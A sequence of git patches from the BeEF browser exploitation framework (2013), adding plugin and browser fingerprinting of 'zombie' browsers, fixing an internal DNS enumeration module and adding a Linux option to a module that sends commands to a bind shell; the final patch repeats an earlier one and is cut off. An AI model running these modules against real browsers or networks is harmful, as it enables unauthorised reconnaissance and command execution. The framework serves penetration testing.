         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 24) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 24.
+     * @example: beef.browser.isC24iOS()
+     */
+    isC24iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 24) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 25.
      * @example: beef.browser.isC25()
@@ -468,6 +516,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 25) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 25.
+     * @example: beef.browser.isC25iOS()
+     */
+    isC25iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 25) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 26.
      * @example: beef.browser.isC26()
@@ -476,6 +532,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 26) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 26.
+     * @example: beef.browser.isC26iOS()
+     */
+    isC26iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 26) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 27.
      * @example: beef.browser.isC27()
@@ -484,6 +548,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 27) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 27.
+     * @example: beef.browser.isC27iOS()
+     */
+    isC27iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 27) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 28.
      * @example: beef.browser.isC28()
@@ -492,12 +564,20 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 28) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 28.
+     * @example: beef.browser.isC28iOS()
+     */
+    isC28iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 28) ? true : false);
+    },
+
     /**
      * Returns true if Chrome.
      * @example: beef.browser.isC()
      */
     isC:function () {
-        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23() || this.isC24() || this.isC25() || this.isC26() || this.isC27() || this.isC28();
+        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS();
     },
 
     /**
@@ -572,15 +652,25 @@ beef.browser = {
             C17:this.isC17(), // Chrome 17
             C18:this.isC18(), // Chrome 18
             C19:this.isC19(), // Chrome 19
+            C19iOS:this.isC19iOS(), // Chrome 19 on iOS
             C20:this.isC20(), // Chrome 20
+            C20iOS:this.isC20iOS(), // Chrome 20 on iOS
             C21:this.isC21(), // Chrome 21
+            C21iOS:this.isC21iOS(), // Chrome 21 on iOS
             C22:this.isC22(), // Chrome 22
+            C22iOS:this.isC22iOS(), // Chrome 22 on iOS
             C23:this.isC23(), // Chrome 23
+            C23iOS:this.isC23iOS(), // Chrome 23 on iOS
             C24:this.isC24(), // Chrome 24
+            C24iOS:this.isC24iOS(), // Chrome 24 on iOS
             C25:this.isC25(), // Chrome 25
+            C25iOS:this.isC25iOS(), // Chrome 25 on iOS
             C26:this.isC26(), // Chrome 26
+            C26iOS:this.isC26iOS(), // Chrome 26 on iOS
             C27:this.isC27(), // Chrome 27
+            C27iOS:this.isC27iOS(), // Chrome 27 on iOS
             C28:this.isC28(), // Chrome 28
+            C28iOS:this.isC28iOS(), // Chrome 28 on iOS
             C:this.isC(), // Chrome any version
 
             FF2:this.isFF2(), // Firefox 2
@@ -696,42 +786,82 @@ beef.browser = {
             return '19'
         }
         ;	// Chrome 19
+        if (this.isC19iOS()) {
+            return '19'
+        }
+        ;   // Chrome 19 for iOS
         if (this.isC20()) {
             return '20'
         }
         ;	// Chrome 20
+        if (this.isC20iOS()) {
+            return '20'
+        }
+        ;   // Chrome 20 for iOS
         if (this.isC21()) {
             return '21'
         }
         ;	// Chrome 21
+        if (this.isC21iOS()) {
+            return '21'
+        }
+        ;   // Chrome 21 for iOS
         if (this.isC22()) {
             return '22'
         }
         ;    // Chrome 22
+        if (this.isC22iOS()) {
+            return '22'
+        }
+        ;   // Chrome 22 for iOS
         if (this.isC23()) {
             return '23'
         }
         ;    // Chrome 23
+        if (this.isC23iOS()) {
+            return '23'
+        }
+        ;   // Chrome 23 for iOS
         if (this.isC24()) {
             return '24'
         }
         ;    // Chrome 24
+        if (this.isC24iOS()) {
+            return '24'
+        }
+        ;   // Chrome 24 for iOS
         if (this.isC25()) {
             return '25'
         }
         ;    // Chrome 25
+        if (this.isC25iOS()) {
+            return '25'
+        }
+        ;   // Chrome 25 for iOS
         if (this.isC26()) {
             return '26'
         }
         ;    // Chrome 26
+        if (this.isC26iOS()) {
+            return '26'
+        }
+        ;   // Chrome 26 for iOS
         if (this.isC27()) {
             return '27'
         }
         ;    // Chrome 27
+        if (this.isC27iOS()) {
+            return '27'
+        }
+        ;   // Chrome 27 for iOS
         if (this.isC28()) {
             return '28'
         }
         ;    // Chrome 28
+        if (this.isC28iOS()) {
+            return '28'
+        }
+        ;   // Chrome 28 for iOS
         if (this.isFF2()) {
             return '2'
         }

From 1be8ec12fd489095c8574908ebe866529a37b094 Mon Sep 17 00:00:00 2001
From: gcatt <giov.catt@gmail.com>
Date: Tue, 18 Jun 2013 23:59:43 +0200
Subject: [PATCH 333/397] Add Unity Web Player detection

---
 core/main/client/browser.js                   | 48 +++++++++++++++++++
 core/main/handlers/browserdetails.rb          |  8 ++++
 .../admin_ui/controllers/modules/modules.rb   |  1 +
 .../admin_ui/controllers/panel/panel.rb       |  2 +
 .../media/javascript/ui/panel/ZombiesMgr.js   |  2 +
 extensions/console/lib/shellinterface.rb      |  1 +
 modules/browser/detect_unity/command.js       | 14 ++++++
 modules/browser/detect_unity/config.yaml      | 15 ++++++
 modules/browser/detect_unity/module.rb        | 14 ++++++
 9 files changed, 105 insertions(+)
 create mode 100644 modules/browser/detect_unity/command.js
 create mode 100644 modules/browser/detect_unity/config.yaml
 create mode 100644 modules/browser/detect_unity/module.rb

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 5b427ffb3..f05f13b83 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -1094,6 +1094,47 @@ beef.browser = {
         }
     },
 
+    /**
+     * Checks if the zombie has the Unity Web Player plugin installed.
+     * @return: {Boolean} true or false.
+     *
+     * @example: if ( beef.browser.hasUnity() ) { ... }
+     */
+    hasUnity:function () {
+
+        var unity = false;
+
+        // Not Internet Explorer
+        if (!this.type().IE) {
+	
+			if (navigator.mimeTypes["application/vnd.unity"].enabledPlugin &&
+	            navigator.plugins &&
+				navigator.plugins["Unity Player"]) {
+					
+					unity = true;
+					
+				}
+
+            // Internet Explorer
+        } else {
+
+            try {
+
+                var qt_test = new ActiveXObject('UnityWebPlayer.UnityWebPlayer.1');
+
+            } catch (e) {
+            }
+
+            if (qt_test) {
+                unity = true;
+            }
+
+        }
+
+        return unity;
+
+    },
+
     /**
      * Checks if the zombie has the QuickTime plugin installed.
      * @return: {Boolean} true or false.
@@ -1545,6 +1586,11 @@ beef.browser = {
                     version = control.getVariable('$version').substring(4);
                     return 'Flash Player v' + version.replace(/,/g, ".");
                 }},
+		    'Unity':{
+                'control':'UnityWebPlayer.UnityWebPlayer.1',
+                'return':function (control) {
+                    return 'Unity Web Player';
+                }},
             'Quicktime':{
                 'control':'QuickTime.QuickTime',
                 'return':function (control) {
@@ -1658,6 +1704,7 @@ beef.browser = {
         var java_enabled     = (beef.browser.javaEnabled()) ?     "Yes" : "No";
         var vbscript_enabled = (beef.browser.hasVBScript()) ?     "Yes" : "No";
         var has_flash        = (beef.browser.hasFlash()) ?        "Yes" : "No";
+        var has_unity        = (beef.browser.hasUnity()) ?        "Yes" : "No";
         var has_phonegap     = (beef.browser.hasPhonegap()) ?     "Yes" : "No";
         var has_googlegears  = (beef.browser.hasGoogleGears()) ?  "Yes" : "No";
         var has_web_socket   = (beef.browser.hasWebSocket()) ?    "Yes" : "No";
@@ -1705,6 +1752,7 @@ beef.browser = {
         if (java_enabled) details['JavaEnabled'] = java_enabled;
         if (vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled;
         if (has_flash) details['HasFlash'] = has_flash;
+		if (has_unity) details['HasUnity'] = has_unity;
         if (has_phonegap) details['HasPhonegap'] = has_phonegap;
         if (has_web_socket) details['HasWebSocket'] = has_web_socket;
         if (has_googlegears) details['HasGoogleGears'] = has_googlegears;
diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb
index 46a3b610d..a32ed7244 100644
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -222,6 +222,14 @@ module BeEF
           else
             self.err_msg "Invalid value for HasFlash returned from the hook browser's initial connection."
           end
+          
+          # get and store the yes|no value for HasUnity
+          has_unity = get_param(@data['results'], 'HasUnity')
+          if BeEF::Filters.is_valid_yes_no?(has_unity)
+            BD.set(session_id, 'HasUnity', has_unity)
+          else
+            self.err_msg "Invalid value for HasUnity returned from the hook browser's initial connection."
+          end
 
           # get and store the yes|no value for HasPhonegap
           has_phonegap = get_param(@data['results'], 'HasPhonegap')
diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb
index 7e8f5a280..58c7ecfd8 100644
--- a/extensions/admin_ui/controllers/modules/modules.rb
+++ b/extensions/admin_ui/controllers/modules/modules.rb
@@ -75,6 +75,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
 
         # Browser Components
         ['Browser Components', 'Flash',              'HasFlash'],
+        ['Browser Components', 'Unity Web Player',   'HasUnity'],
         ['Browser Components', 'Java',               'JavaEnabled'],
         ['Browser Components', 'VBScript',           'VBScriptEnabled'],
         ['Browser Components', 'PhoneGap',           'HasPhonegap'],
diff --git a/extensions/admin_ui/controllers/panel/panel.rb b/extensions/admin_ui/controllers/panel/panel.rb
index 255deef34..e02938af3 100644
--- a/extensions/admin_ui/controllers/panel/panel.rb
+++ b/extensions/admin_ui/controllers/panel/panel.rb
@@ -85,6 +85,7 @@ module BeEF
             hw_name         = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'Hardware')
             domain          = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
             has_flash       = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash')
+            has_unity       = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasUnity')
             has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket')
             has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears')
             has_java        = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
@@ -111,6 +112,7 @@ module BeEF
                 'hw_icon'         => hw_icon,
                 'hw_name'         => hw_name,
                 'has_flash'       => has_flash,
+                'has_unity'       => has_unity,
                 'has_web_sockets' => has_web_sockets,
                 'has_googlegears' => has_googlegears,
                 'has_java'        => has_java,
diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
index edcb09c5e..68c314a8e 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
@@ -24,6 +24,7 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		var domain             = zombie_array[index]["domain"];
 		var port               = zombie_array[index]["port"];
 		var has_flash          = zombie_array[index]["has_flash"];
+		var has_unity          = zombie_array[index]["has_unity"];
 		var has_web_sockets    = zombie_array[index]["has_web_sockets"];
 		var has_googlegears    = zombie_array[index]["has_googlegears"];
 		var has_java           = zombie_array[index]["has_java"];
@@ -48,6 +49,7 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		balloon_text+= "<br/>Hardware: "       + hw_name;
 		balloon_text+= "<br/>Domain: "         + domain + ":" + port;
 		balloon_text+= "<br/>Flash: "          + has_flash;
+		balloon_text+= "<br/>Unity Web Player: " + has_unity;
 		balloon_text+= "<br/>Java: "           + has_java;
 		balloon_text+= "<br/>Web Sockets: "    + has_web_sockets;
 		balloon_text+= "<br/>WebRTC: "         + has_webrtc;
diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb
index 2051dd7cc..03c01669c 100644
--- a/extensions/console/lib/shellinterface.rb
+++ b/extensions/console/lib/shellinterface.rb
@@ -291,6 +291,7 @@ class ShellInterface
 
         # Browser Components
         ['Browser Components', 'Flash',              'HasFlash'],
+        ['Browser Components', 'Unity Web Player',   'HasUnity'],
         ['Browser Components', 'Java',               'JavaEnabled'],
         ['Browser Components', 'VBScript',           'VBScriptEnabled'],
         ['Browser Components', 'PhoneGap',           'HasPhonegap'],
diff --git a/modules/browser/detect_unity/command.js b/modules/browser/detect_unity/command.js
new file mode 100644
index 000000000..304766b2d
--- /dev/null
+++ b/modules/browser/detect_unity/command.js
@@ -0,0 +1,14 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var result = (beef.browser.hasUnity())? "Yes" : "No";
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "unity="+result);
+
+});
+
diff --git a/modules/browser/detect_unity/config.yaml b/modules/browser/detect_unity/config.yaml
new file mode 100644
index 000000000..350ec01b4
--- /dev/null
+++ b/modules/browser/detect_unity/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_unity:
+            enable: true
+            category: "Browser"
+            name: "Detect Unity Web Player"
+            description: "This module will check if the browser has Unity support."
+            authors: ["gcattani"]
+            target:
+                working: ["All"]
diff --git a/modules/browser/detect_unity/module.rb b/modules/browser/detect_unity/module.rb
new file mode 100644
index 000000000..70575825d
--- /dev/null
+++ b/modules/browser/detect_unity/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_unity < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['unity'] = @datastore['unity']
+		save content
+	end
+
+end

From e95c74b5e159f4b96d7f4406e212a797969c398a Mon Sep 17 00:00:00 2001
From: Nbblrr <Nbblrr>
Date: Fri, 28 Jun 2013 14:33:33 +0200
Subject: [PATCH 334/397] DNS Enumeration module does not consider the user
 timeout parameter

---
 modules/network/dns_enumeration/command.js | 20 ++++++++++----------
 1 file changed, 10 insertions(+), 10 deletions(-)

diff --git a/modules/network/dns_enumeration/command.js b/modules/network/dns_enumeration/command.js
index cd7397570..172a34c2d 100644
--- a/modules/network/dns_enumeration/command.js
+++ b/modules/network/dns_enumeration/command.js
@@ -9,26 +9,26 @@ beef.execute(function() {
     var dns_list = "<%= @dns_list %>";
     var timeout = parseInt("<%= @timeout %>");
 
-    var cont=0; 
+    var cont=0;
     var port = 900;
     var protocol="http://";
     var hostnames;
 
     if(dns_list!="%default%") {
-        hostnames = dns_list.split(","); 
+        hostnames = dns_list.split(",");
     } else {
         hostnames = new Array("abc", "about", "accounts", "admin", "administrador", "administrator", "ads", "adserver", "adsl", "agent", "blog", "channel", "client", "dev", "dev1", "dev2", "dev3", "dev4", "dev5", "dmz", "dns", "dns0", "dns1", "dns2", "dns3", "extern", "extranet", "file", "forum", "forums", "ftp", "ftpserver", "host", "http", "https", "ida", "ids", "imail", "imap", "imap3", "imap4", "install", "intern", "internal", "intranet", "irc", "linux", "log", "mail", "map", "member", "members", "name", "nc", "ns", "ntp", "ntserver", "office", "owa", "phone", "pop", "ppp1", "ppp10", "ppp11", "ppp12", "ppp13", "ppp14", "ppp15", "ppp16", "ppp17", "ppp18", "ppp19", "ppp2", "ppp20", "ppp21", "ppp3", "ppp4", "ppp5", "ppp6", "ppp7", "ppp8", "ppp9", "pptp", "print", "printer", "project", "pub", "public", "preprod", "root", "route", "router", "server", "smtp", "sql", "sqlserver", "ssh", "telnet", "time", "voip", "w", "webaccess", "webadmin", "webmail", "webserver", "website", "win", "windows", "ww", "www", "wwww", "xml");
     }
-    
+
     function notify() {
         beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Internal DNS found: '+ hostnames[cont]);
         check_next();
     }
-    
-    function check_next() { 
+
+    function check_next() {
         cont++;
-        if(cont<hostnames.length) do_resolv(protocol + hostnames[cont] + ":" + port); 
-        else setTimeout(function(){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=DNS Enumeration done') }, 1000); 
+        if(cont<hostnames.length) do_resolv(protocol + hostnames[cont] + ":" + port);
+        else setTimeout(function(){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=DNS Enumeration done') }, 1000);
     }
 
     function do_resolv(url) {
@@ -42,15 +42,15 @@ beef.execute(function() {
         } else {
             return -1;
         }
-        
+
         xhr.onreadystatechange= function(e) { if(xhr.readyState==4) { clearTimeout(p); check_next(); } };
         xhr.send();
-        var p = setTimeout(function() { xhr.onreadystatechange = function(evt) {}; notify(); }, 4000);
+        var p = setTimeout(function() { xhr.onreadystatechange = function(evt) {}; notify(); }, timeout);
     }
 
     beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Starting DNS enumeration: '+ hostnames.length + ' hostnames loaded');
     if(do_resolv(protocol + hostnames[0] + ":" + port)==-1) {
-        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser not supported'); 
+        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser not supported');
     }
 
 });

From 164ff5bea629e520e281ff025528ed4c43b21fe6 Mon Sep 17 00:00:00 2001
From: bmantra <bart.leppens@gmail.com>
Date: Fri, 28 Jun 2013 20:42:53 +0200
Subject: [PATCH 335/397] added option for LF only, to use with Linux

---
 modules/exploits/beefbind/beef_bind_shell/command.js | 7 ++++++-
 modules/exploits/beefbind/beef_bind_shell/module.rb  | 6 +++++-
 2 files changed, 11 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/beefbind/beef_bind_shell/command.js b/modules/exploits/beefbind/beef_bind_shell/command.js
index da6d040f0..afd6b8256 100755
--- a/modules/exploits/beefbind/beef_bind_shell/command.js
+++ b/modules/exploits/beefbind/beef_bind_shell/command.js
@@ -9,6 +9,7 @@ beef.execute(function () {
     var rport = '<%= @rport %>';
     var path = '<%= @path %>';
     var cmd = '<%= @cmd %>';
+    var shellcode ='<%= @shellcode %>';
 
     var uri = "http://" + rhost + ":" + rport + path;
 
@@ -73,7 +74,11 @@ beef.execute(function () {
         };
         xhr.open("POST", uri, false);
         xhr.setRequestHeader("Content-Type", "text/plain");
-        command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?"
+	if (shellcode == 'Linux'){
+            command = "cmd=" + command + "\n"; // very important only LF
+        }else{
+            command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?"
+        }
         xhr.send(command);
         setTimeout("get_additional_cmd_results()",500);
     };
diff --git a/modules/exploits/beefbind/beef_bind_shell/module.rb b/modules/exploits/beefbind/beef_bind_shell/module.rb
index 5eac5a4a0..dc84c3c03 100755
--- a/modules/exploits/beefbind/beef_bind_shell/module.rb
+++ b/modules/exploits/beefbind/beef_bind_shell/module.rb
@@ -10,7 +10,11 @@ class Beef_bind_shell < BeEF::Core::Command
       { 'name' => 'rhost', 'ui_label' => 'Host', 'value' => '127.0.0.1'},
       { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'},
       { 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'},
-      { 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'}
+      { 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'},
+      { 'name' => 'shellcode', 'type' => 'combobox', 'ui_label' => 'BeEF Bind Shellcode', 'store_type' => 'arraystore',
+          'store_fields' => ['shellcode'], 'store_data' => [['Windows'],['Linux']],
+          'valueField' => 'shellcode', 'displayField' => 'shellcode', 'mode' => 'local', 'autoWidth' => true
+        }
 		]
 	end
 

From e61b26692145486d7f9a7836d6c4d455be81a375 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 1 Jul 2013 00:42:47 +0930
Subject: [PATCH 336/397] update version

---
 VERSION     | 2 +-
 config.yaml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/VERSION b/VERSION
index 1c48bbad1..11ac0da8e 100644
--- a/VERSION
+++ b/VERSION
@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.4.6-alpha
+0.4.4.7-alpha
diff --git a/config.yaml b/config.yaml
index 54728de0d..a70f427f2 100644
--- a/config.yaml
+++ b/config.yaml
@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.4.6-alpha'
+    version: '0.4.4.7-alpha'
     debug: false
 
     restrictions:

From 696e3715feb1ae1ab226c7d8f2df954769e5b5dc Mon Sep 17 00:00:00 2001
From: gcatt <giov.catt@gmail.com>
Date: Tue, 18 Jun 2013 23:59:43 +0200
Subject: [PATCH 337/397] Add Unity Web Player detection

---
 core/main/client/browser.js                   | 48 +++++++++++++++++++
 core/main/handlers/browserdetails.rb          |  8 ++++
 .../admin_ui/controllers/modules/modules.rb   |  1 +
 .../admin_ui/controllers/panel/panel.rb       |  2 +
 .../media/javascript/ui/panel/ZombiesMgr.js   |  2 +
 extensions/console/lib/shellinterface.rb      |  1 +
 modules/browser/detect_unity/command.js       | 14 ++++++
 modules/browser/detect_unity/config.yaml      | 15 ++++++
 modules/browser/detect_unity/module.rb        | 14 ++++++
 9 files changed, 105 insertions(+)
 create mode 100644 modules/browser/detect_unity/command.js
 create mode 100644 modules/browser/detect_unity/config.yaml
 create mode 100644 modules/browser/detect_unity/module.rb

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 5b427ffb3..f05f13b83 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -1094,6 +1094,47 @@ beef.browser = {
         }
     },
 
+    /**
+     * Checks if the zombie has the Unity Web Player plugin installed.
+     * @return: {Boolean} true or false.
+     *
+     * @example: if ( beef.browser.hasUnity() ) { ... }
+     */
+    hasUnity:function () {
+
+        var unity = false;
+
+        // Not Internet Explorer
+        if (!this.type().IE) {
+	
+			if (navigator.mimeTypes["application/vnd.unity"].enabledPlugin &&
+	            navigator.plugins &&
+				navigator.plugins["Unity Player"]) {
+					
+					unity = true;
+					
+				}
+
+            // Internet Explorer
+        } else {
+
+            try {
+
+                var qt_test = new ActiveXObject('UnityWebPlayer.UnityWebPlayer.1');
+
+            } catch (e) {
+            }
+
+            if (qt_test) {
+                unity = true;
+            }
+
+        }
+
+        return unity;
+
+    },
+
     /**
      * Checks if the zombie has the QuickTime plugin installed.
      * @return: {Boolean} true or false.
@@ -1545,6 +1586,11 @@ beef.browser = {
                     version = control.getVariable('$version').substring(4);
                     return 'Flash Player v' + version.replace(/,/g, ".");
                 }},
+		    'Unity':{
+                'control':'UnityWebPlayer.UnityWebPlayer.1',
+                'return':function (control) {
+                    return 'Unity Web Player';
+                }},
             'Quicktime':{
                 'control':'QuickTime.QuickTime',
                 'return':function (control) {
@@ -1658,6 +1704,7 @@ beef.browser = {
         var java_enabled     = (beef.browser.javaEnabled()) ?     "Yes" : "No";
         var vbscript_enabled = (beef.browser.hasVBScript()) ?     "Yes" : "No";
         var has_flash        = (beef.browser.hasFlash()) ?        "Yes" : "No";
+        var has_unity        = (beef.browser.hasUnity()) ?        "Yes" : "No";
         var has_phonegap     = (beef.browser.hasPhonegap()) ?     "Yes" : "No";
         var has_googlegears  = (beef.browser.hasGoogleGears()) ?  "Yes" : "No";
         var has_web_socket   = (beef.browser.hasWebSocket()) ?    "Yes" : "No";
@@ -1705,6 +1752,7 @@ beef.browser = {
         if (java_enabled) details['JavaEnabled'] = java_enabled;
         if (vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled;
         if (has_flash) details['HasFlash'] = has_flash;
+		if (has_unity) details['HasUnity'] = has_unity;
         if (has_phonegap) details['HasPhonegap'] = has_phonegap;
         if (has_web_socket) details['HasWebSocket'] = has_web_socket;
         if (has_googlegears) details['HasGoogleGears'] = has_googlegears;
diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb
index 46a3b610d..a32ed7244 100644
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -222,6 +222,14 @@ module BeEF
           else
             self.err_msg "Invalid value for HasFlash returned from the hook browser's initial connection."
           end
+          
+          # get and store the yes|no value for HasUnity
+          has_unity = get_param(@data['results'], 'HasUnity')
+          if BeEF::Filters.is_valid_yes_no?(has_unity)
+            BD.set(session_id, 'HasUnity', has_unity)
+          else
+            self.err_msg "Invalid value for HasUnity returned from the hook browser's initial connection."
+          end
 
           # get and store the yes|no value for HasPhonegap
           has_phonegap = get_param(@data['results'], 'HasPhonegap')
diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb
index 7e8f5a280..58c7ecfd8 100644
--- a/extensions/admin_ui/controllers/modules/modules.rb
+++ b/extensions/admin_ui/controllers/modules/modules.rb
@@ -75,6 +75,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
 
         # Browser Components
         ['Browser Components', 'Flash',              'HasFlash'],
+        ['Browser Components', 'Unity Web Player',   'HasUnity'],
         ['Browser Components', 'Java',               'JavaEnabled'],
         ['Browser Components', 'VBScript',           'VBScriptEnabled'],
         ['Browser Components', 'PhoneGap',           'HasPhonegap'],
diff --git a/extensions/admin_ui/controllers/panel/panel.rb b/extensions/admin_ui/controllers/panel/panel.rb
index 255deef34..e02938af3 100644
--- a/extensions/admin_ui/controllers/panel/panel.rb
+++ b/extensions/admin_ui/controllers/panel/panel.rb
@@ -85,6 +85,7 @@ module BeEF
             hw_name         = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'Hardware')
             domain          = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
             has_flash       = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash')
+            has_unity       = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasUnity')
             has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket')
             has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears')
             has_java        = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
@@ -111,6 +112,7 @@ module BeEF
                 'hw_icon'         => hw_icon,
                 'hw_name'         => hw_name,
                 'has_flash'       => has_flash,
+                'has_unity'       => has_unity,
                 'has_web_sockets' => has_web_sockets,
                 'has_googlegears' => has_googlegears,
                 'has_java'        => has_java,
diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
index edcb09c5e..68c314a8e 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
@@ -24,6 +24,7 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		var domain             = zombie_array[index]["domain"];
 		var port               = zombie_array[index]["port"];
 		var has_flash          = zombie_array[index]["has_flash"];
+		var has_unity          = zombie_array[index]["has_unity"];
 		var has_web_sockets    = zombie_array[index]["has_web_sockets"];
 		var has_googlegears    = zombie_array[index]["has_googlegears"];
